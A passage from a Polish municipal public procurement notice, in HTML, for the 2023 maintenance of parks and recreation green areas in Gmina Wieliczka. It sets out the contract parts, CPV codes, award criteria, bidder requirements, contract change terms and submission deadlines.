ulic<br/>77211500-7 Usługi pielęgnacji drzew <br/>77314100-5 Usługi w zakresie trawników<br/>3. Szczegółowy zakres prac oraz wraz z częścią graficzną (mapy) stanowi załącznik nr 5 do SWZ.<br/>4. Wymogi dodatkowe: pilne prace interwencyjne winny być wykonywane niezwłocznie także w godzinach popołudniowych oraz w dniach wolnych od pracy, Wykonawca ponosi wszelką odpowiedzialność za wypadki zaistniałe na terenie przez niego utrzymywanym a wynikające z niedopełnienia obowiązków, wykonawca zabezpiecza teren robót i zapewnia na własny koszt warunki bezpieczeństwa, Wykonawca w przypadku interwencji miejskich służb porządkowych (Policji, Straży Miejskiej) każdorazowo ponosi odpowiedzialność za nienależyte wykonanie zadania.<br/>5. Dodatkowe informacje dotyczące przedmiotu zamówienia:<br/>5.1. Wykonawca w trakcie wykonywania usług ponosi odpowiedzialność (z tytułu prowadzonych robót) za bezpieczeństwo swoich pracowników oraz innych osób znajdujących się w obrębie prowadzonych prac.<br/>5.2. Zamawiający zobowiązuje Wykonawcę, którego oferta zostanie wybrana jako najkorzystniejsza w niniejszym postępowaniu do posiadania opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia przez cały okres realizacji zamówienia w wysokości minimum 30 000,00 zł (niezależnie od części na którą jego oferta zostanie wybrana).<br/>5.3. Zamawiający na podstawie art. 95 ust. 1 ustawy Pzp wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących czynności w zakresie realizacji zamówienia, zgodnie z pkt 21 SWZ.<br/>6. Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 23 kwietnia 1964r. Kodeks cywilny (t.j. Dz. U. z 2022 r. poz. 1360 ze zm), ustawie z dnia 11 września 2019r. prawo zamówień publicznych (tj.: Dz.U. z 2022r. poz. 1710 ze zm.), ustawie z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych (tj.: Dz. U. z 2022 r. poz. 1083, 1260, 2687 ze zm.)<br/>7. Jeżeli w SWZ zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 99 ust. 5 ustawy Pzp, zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zagwarantują one prawidłową realizację robót oraz zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach. Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez zamawiającego. W takim przypadku wykonawca załącza do oferty wykaz rozwiązań równoważnych stosownie wraz z jego opisem lub normami.<br/>8. W przypadku opisania przedmiotu zamówienia w SWZ wraz z załącznikami poprzez odniesienie się do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 uPzp, zamawiający dopuszcza rozwiązania równoważne opisywanym. <br/>8.1. Normy, oceny techniczne, specyfikacje techniczne i systemy referencji technicznych o których mowa w art. 101 ust. 1 pkt 2 uPzp oraz ust. 3 uPzp to:<br/>a) Polskie Normy przenoszące normy europejskie,<br/>b) normy innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących normy europejskie,<br/>c) europejskie oceny techniczne, rozumiane jako udokumentowane oceny działania wyrobu budowlanego względem jego podstawowych cech, zgodnie z odpowiednim europejskim dokumentem oceny, w rozumieniu art. 2 pkt 12 rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 305/2011 z dnia 9 marca 2011 r. ustanawiającego zharmonizowane warunki wprowadzania do obrotu wyrobów budowlanych i uchylającego dyrektywę Rady 89/106/EWG (Dz. Urz. UE L 88 z 04.04.2011, str. 5, z późn. zm.),<br/>d) wspólne specyfikacje techniczne, rozumiane jako specyfikacje techniczne w dziedzinie produktów teleinformatycznych określone zgodnie z art. 13 i art. 14 rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 1025/2012 z dnia 25 października 2012 r. w sprawie normalizacji europejskiej, zmieniającego dyrektywy Rady 89/686/EWG i 93/15/EWG oraz dyrektywy Parlamentu Europejskiego i Rady 94/9/WE, 94/25/WE, 95/16/WE, 97/23/WE, 98/34/WE, 2004/22/WE, 2007/23/WE, 2009/23/WE i 2009/105/WE oraz uchylającego decyzję Rady 87/95/EWG i decyzję Parlamentu Europejskiego i Rady nr 1673/2006/WE (Dz. Urz. UE L 316 z 14.11.2012, str. 12 z późn. zm.),<br/>e) normy międzynarodowe,<br/>f) specyfikacje techniczne, których przestrzeganie nie jest obowiązkowe, przyjętych przez instytucję normalizacyjną, wyspecjalizowaną w opracowywaniu specyfikacji technicznych w celu powtarzalnego i stałego stosowania,<br/>g) inne systemy referencji technicznych ustanowionych przez europejskie organizacje normalizacyjne,<br/>8.2. Przez normę należy rozumieć specyfikację techniczną przyjętą przez krajową, europejską lub międzynarodową instytucję normalizacyjną w celu powtarzalnego i stałego stosowania, której przestrzeganie nie jest obowiązkowe, w tym Polską Normę, normę europejską lub normę międzynarodową.<br/>8.3. W przypadku braku Polskich Norm przenoszących normy europejskie, norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących normy europejskie oraz norm, europejskich ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust.1 pkt 2 uPzp, przy opisie przedmiotu zamówienia uwzględnia się w kolejności:<br/>a) Polskie Normy,<br/>b) krajowe oceny techniczne wydawane na podstawie ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz.U. z 2021 r. poz. 1213),<br/>c) polskie specyfikacje techniczne dotyczące projektowania, wyliczeń i realizacji robót budowlanych oraz wykorzystania dostaw,<br/>d) krajowe deklaracje zgodności oraz krajowe deklaracje właściwości użytkowych wyrobu budowlanego.<br/>8.4. Przepis art. 101 ust. 5 i 6 uPzp stosuje się. <br/>9. Zamawiający informuje, że dopuszcza się możliwość przeprowadzenia wizji lokalnej, przy czym możliwe jest złożenie oferty bez jej przeprowadzenia. Zamawiający nie przewiduje odrzucenia oferty Wykonawcy, który nie odbył wizji lokalnej w ramach przedmiotowego postępowania. W celu umówienia wizji lokalnej na terenie inwestycji Wykonawca zobowiązany jest skontaktować się z osobami wyznaczonymi do komunikowania się z wykonawcami. Zamawiający informuje, że w trakcie wizji lokalnej nie będą udzielane żadne odpowiedzi na pytania oraz nie będą sporządzane protokoły z tych wizji. Wszelkie niezbędne dokumenty są zamieszczone na stronie prowadzonego postępowania i w związku z tym Zamawiający nie przewiduje możliwości ani nie stawia wymogu sprawdzenia przez wykonawcę dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u zamawiającego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 118277,02 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77313000-7 - Usługi utrzymania parków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90610000-6 - Usługi sprzątania i zamiatania ulic</p> <p class="mb-0">77211500-7 - Usługi pielęgnacji drzew</p> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie te oferty, które odpowiadają wymaganiom opisanym w niniejszej SWZ. Wybór najkorzystniejszej oferty nastąpi na podstawie wyznaczonych przez Zamawiającego kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby sprawującej nadzór</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest utrzymanie zieleni urządzonej na terenach parkowo – rekreacyjnych Gminy Wieliczka w 2023r.:<br/>Część 3 - Teren rekreacyjny w Brzegach działka nr 455/2 obr. Brzegi<br/>a) utrzymanie czystości - 26 900 m2;<br/>b) pielęgnacja trawników (koszenie) - 26 900 m2;<br/>2. Wspólny słownik zamówień publicznych CPV: <br/> 77314100-5 Usługi w zakresie trawników<br/>3. Szczegółowy zakres prac oraz wraz z częścią graficzną (mapy) stanowi załącznik nr 5 do SWZ.<br/>4. Wymogi dodatkowe: pilne prace interwencyjne winny być wykonywane niezwłocznie także w godzinach popołudniowych oraz w dniach wolnych od pracy, Wykonawca ponosi wszelką odpowiedzialność za wypadki zaistniałe na terenie przez niego utrzymywanym a wynikające z niedopełnienia obowiązków, wykonawca zabezpiecza teren robót i zapewnia na własny koszt warunki bezpieczeństwa, Wykonawca w przypadku interwencji miejskich służb porządkowych (Policji, Straży Miejskiej) każdorazowo ponosi odpowiedzialność za nienależyte wykonanie zadania.<br/>5. Dodatkowe informacje dotyczące przedmiotu zamówienia:<br/>5.1. Wykonawca w trakcie wykonywania usług ponosi odpowiedzialność (z tytułu prowadzonych robót) za bezpieczeństwo swoich pracowników oraz innych osób znajdujących się w obrębie prowadzonych prac.<br/>5.2. Zamawiający zobowiązuje Wykonawcę, którego oferta zostanie wybrana jako najkorzystniejsza w niniejszym postępowaniu do posiadania opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia przez cały okres realizacji zamówienia w wysokości minimum 30 000,00 zł (niezależnie od części na którą jego oferta zostanie wybrana).<br/>5.3. Zamawiający na podstawie art. 95 ust. 1 ustawy Pzp wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących czynności w zakresie realizacji zamówienia, zgodnie z pkt 21 SWZ.<br/>6. Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 23 kwietnia 1964r. Kodeks cywilny (t.j. Dz. U. z 2022 r. poz. 1360 ze zm), ustawie z dnia 11 września 2019r. prawo zamówień publicznych (tj.: Dz.U. z 2022r. poz. 1710 ze zm.), ustawie z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych (tj.: Dz. U. z 2022 r. poz. 1083, 1260, 2687 ze zm.)<br/>7. Jeżeli w SWZ zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 99 ust. 5 ustawy Pzp, zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zagwarantują one prawidłową realizację robót oraz zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach. Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez zamawiającego. W takim przypadku wykonawca załącza do oferty wykaz rozwiązań równoważnych stosownie wraz z jego opisem lub normami.<br/>8. W przypadku opisania przedmiotu zamówienia w SWZ wraz z załącznikami poprzez odniesienie się do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 uPzp, zamawiający dopuszcza rozwiązania równoważne opisywanym. <br/>8.1. Normy, oceny techniczne, specyfikacje techniczne i systemy referencji technicznych o których mowa w art. 101 ust. 1 pkt 2 uPzp oraz ust. 3 uPzp to:<br/>a) Polskie Normy przenoszące normy europejskie,<br/>b) normy innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących normy europejskie,<br/>c) europejskie oceny techniczne, rozumiane jako udokumentowane oceny działania wyrobu budowlanego względem jego podstawowych cech, zgodnie z odpowiednim europejskim dokumentem oceny, w rozumieniu art. 2 pkt 12 rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 305/2011 z dnia 9 marca 2011 r. ustanawiającego zharmonizowane warunki wprowadzania do obrotu wyrobów budowlanych i uchylającego dyrektywę Rady 89/106/EWG (Dz. Urz. UE L 88 z 04.04.2011, str. 5, z późn. zm.),<br/>d) wspólne specyfikacje techniczne, rozumiane jako specyfikacje techniczne w dziedzinie produktów teleinformatycznych określone zgodnie z art. 13 i art. 14 rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 1025/2012 z dnia 25 października 2012 r. w sprawie normalizacji europejskiej, zmieniającego dyrektywy Rady 89/686/EWG i 93/15/EWG oraz dyrektywy Parlamentu Europejskiego i Rady 94/9/WE, 94/25/WE, 95/16/WE, 97/23/WE, 98/34/WE, 2004/22/WE, 2007/23/WE, 2009/23/WE i 2009/105/WE oraz uchylającego decyzję Rady 87/95/EWG i decyzję Parlamentu Europejskiego i Rady nr 1673/2006/WE (Dz. Urz. UE L 316 z 14.11.2012, str. 12 z późn. zm.),<br/>e) normy międzynarodowe,<br/>f) specyfikacje techniczne, których przestrzeganie nie jest obowiązkowe, przyjętych przez instytucję normalizacyjną, wyspecjalizowaną w opracowywaniu specyfikacji technicznych w celu powtarzalnego i stałego stosowania,<br/>g) inne systemy referencji technicznych ustanowionych przez europejskie organizacje normalizacyjne,<br/>8.2. Przez normę należy rozumieć specyfikację techniczną przyjętą przez krajową, europejską lub międzynarodową instytucję normalizacyjną w celu powtarzalnego i stałego stosowania, której przestrzeganie nie jest obowiązkowe, w tym Polską Normę, normę europejską lub normę międzynarodową.<br/>8.3. W przypadku braku Polskich Norm przenoszących normy europejskie, norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących normy europejskie oraz norm, europejskich ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust.1 pkt 2 uPzp, przy opisie przedmiotu zamówienia uwzględnia się w kolejności:<br/>a) Polskie Normy,<br/>b) krajowe oceny techniczne wydawane na podstawie ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz.U. z 2021 r. poz. 1213),<br/>c) polskie specyfikacje techniczne dotyczące projektowania, wyliczeń i realizacji robót budowlanych oraz wykorzystania dostaw,<br/>d) krajowe deklaracje zgodności oraz krajowe deklaracje właściwości użytkowych wyrobu budowlanego.<br/>8.4. Przepis art. 101 ust. 5 i 6 uPzp stosuje się. <br/>9. Zamawiający informuje, że dopuszcza się możliwość przeprowadzenia wizji lokalnej, przy czym możliwe jest złożenie oferty bez jej przeprowadzenia. Zamawiający nie przewiduje odrzucenia oferty Wykonawcy, który nie odbył wizji lokalnej w ramach przedmiotowego postępowania. W celu umówienia wizji lokalnej na terenie inwestycji Wykonawca zobowiązany jest skontaktować się z osobami wyznaczonymi do komunikowania się z wykonawcami. Zamawiający informuje, że w trakcie wizji lokalnej nie będą udzielane żadne odpowiedzi na pytania oraz nie będą sporządzane protokoły z tych wizji. Wszelkie niezbędne dokumenty są zamieszczone na stronie prowadzonego postępowania i w związku z tym Zamawiający nie przewiduje możliwości ani nie stawia wymogu sprawdzenia przez wykonawcę dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u zamawiającego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 20787,16 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77314100-5 - Usługi w zakresie trawników</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie te oferty, które odpowiadają wymaganiom opisanym w niniejszej SWZ. Wybór najkorzystniejszej oferty nastąpi na podstawie wyznaczonych przez Zamawiającego kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby sprawującej nadzór</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają określone przez zamawiającego warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek jeżeli wykaże że, w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń powtarzających się lub ciągłych wykonuje, co najmniej dwie usługi polegające na utrzymaniu lub/i konserwacji lub /i pielęgnacji zieleni przez okres minimum 6 miesięcy na terenach zielonych o powierzchni co najmniej 0,8 ha. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu potwierdzenia zgodności złożonej oferty z kryteriami określonymi w opisie kryteriów oceny ofert, (dot. doświadczenia osoby sprawującej nadzór nad wykonywaniem zamówienia), Wykonawca zobowiązany jest do złożenia wraz z ofertą dowodów potwierdzających okres wykonywania usług w których osoba wskazana w ofercie sprawowała nadzór. Poprzez dowody należy rozumieć referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego zostały wykonane usługi, w których osoba wskazana w ofercie prowadziła nadzór. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym – sporządzonym według wzoru stanowiącym Załącznik nr 1 do SWZ, wypełnionym dla części na którą Wykonawca składa ofertę oraz opatrzony stosownym podpisem.<br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1. Wypełniony formularz cenowy dla części na którą Wykonawca składa ofertę, sporządzony dla odpowiednio na Załączniku nr 1a (Cześć 1), 1b (Część 2), 1c (Część 3) do SWZ oraz opatrzony stosownym podpisem. Niezłożenie formularza cenowego dla danej części zamówienia skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 uPzp w tej części. <br/>2. Oświadczenie, o którym mowa w art. 125 ust. 1 uPzp, t.j oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – sporządzone zgodnie z Załącznikiem nr 2 do SWZ oraz opatrzone stosownym podpisem. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>2.1. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. W/w dotyczy również odpowiednio wspólników spółki cywilnej, którzy traktowani będą jak wykonawcy wspólnie ubiegający się u dzielenie zamówienia publicznego.<br/>2.2. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem o którym mowa w art. 125 ust. 1 uPzp, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby. <br/>3. Zobowiązanie innego podmiotu do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy (jeżeli dotyczy), o których mowa w pkt 16.2.2) SWZ. <br/>4. Dokumenty, z których wynika prawo do podpisania oferty – (np. odpis z KRS, CEiIoDG, odpowiednie pełnomocnictwa), o których mowa w pkt 30 SWZ.<br/>5. Oświadczenie z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy – w przypadku zaistnienia okoliczności o których mowa w pkt 16.1.5.2) SWZ. Oświadczenie należy złożyć według wzoru stanowiącego załącznik nr 4 do SWZ.<br/>6. Przedmiotowe środki dowodowe. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia i w takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu, albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy załączyć do oferty dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia.<br/>4. Pełnomocnictwo musi przyjąć taką samą formę jak składana oferta (art. 99 § 1 KC).<br/>5. Oświadczenie o którym mowa w art. 15 ust. 1 uPZP składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>6. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>6.1. Zamawiający zastrzega, że w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, co najmniej jeden z tych Wykonawców musi wykazać posiadanie wymaganego doświadczenia,<br/>6.2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane, przy czym w takim wypadku Wykonawcy wraz z ofertą zobowiązani są złożyć oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Do zmian umowy zastosowanie mają przepisy art. 454-455 uPzp.<br/>2. Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty w przypadku (art. 455 ust. 1 pkt 1 uPzp):<br/>1) zmian nazwy, siedziby lub innych danych Wykonawcy,<br/>2) udziału lub zmiany podwykonawców,<br/>3) wszelkich zmian wynikających z konieczności dostosowania warunków już zawartej umowy do nowych uregulowań prawnych,<br/>4) zmiany wynagrodzenia brutto w związku ze zmianą stawki podatku VAT. Wartości netto pozostaną bez zmian, a nowe kwoty wynagrodzenia brutto Wykonawcy zostaną wyliczone na podstawie nowych przepisów.<br/>5) zmian prowadzących do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy,<br/>6) zmiany osób wskazanych w umowie, przy czym w przypadku zmiany osoby sprawującej nadzór wskazanej w ofercie, osoba zastępująca musi posiadać doświadczenie odpowiadające punktacji przyznanej w kryterium oceny ofert za doświadczenie osoby zastępowanej,<br/>7) dopuszczalne są wszelkie zmiany które nie są istotne w rozumieniu art. 454 ust. 2 uPzp,<br/>8) wystąpienia niemożliwych do przewidzenia prac wymagających wykonania prac zastępczych lub dodatkowych, nie leżących po stronie Wykonawcy z przyczyn powodujących opóźnienie w wykonaniu umowy.<br/>9) zmian poprawiających sprawność wykonywania usług (w tym zmiana technologii ich wykonywania), pod warunkiem że nie spowoduje to wzrostu wynagrodzenia; w przypadku zaniechania wykonania usług wynagrodzenie ulegnie pomniejszeniu.<br/>3. Określa się następujący tryb dokonywania zmian postanowień umowy. Sposób inicjowania zmian:<br/>1) Wykonawca wnioskuje do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany,<br/>2) Zamawiający wnioskuje do Wykonawcy w sprawie możliwości dokonania wskazanej zmiany.<br/>3) Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach takich jak notatka służbowa, pismo Wykonawcy, protokół konieczności itp.<br/><br/>c.d. w sekcji IX nin. ogłoszenia <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/wieliczka</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-08 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> c.d. zmiany umowy.<br/>4. Zamawiający przewiduje możliwości dokonania zmiany wynagrodzenia należnego Wykonawcy poprzez zawarcie aneksu do niniejszej umowy w niżej wymienionych przypadkach (tzw. klauzula waloryzacyjna).<br/>1) Zmiana wynagrodzenia musi być związana ze zmianą kosztów związanych z realizacją zamówienia oraz jest możliwa jednorazowo, w oparciu o wskaźnik cen towarów i usług konsumpcyjnych (ogółem) publikowanego raz na miesiąc przez Prezesa Głównego Urzędu Statystycznego (dalej: „wskaźnik GUS”).<br/>2) Przez zmianę kosztów rozumie się wzrost kosztów, jak i ich obniżenie, względem kosztów przyjętych w celu ustalenia wynagrodzenia wykonawcy zawartego w ofercie.<br/>3) Waloryzacja może nastąpić na podstawie wniosku złożonego przez jedną ze stron umowy nie wcześniej niż po upływie 6 miesięcy licząc od daty zawarcia umowy.<br/>4) 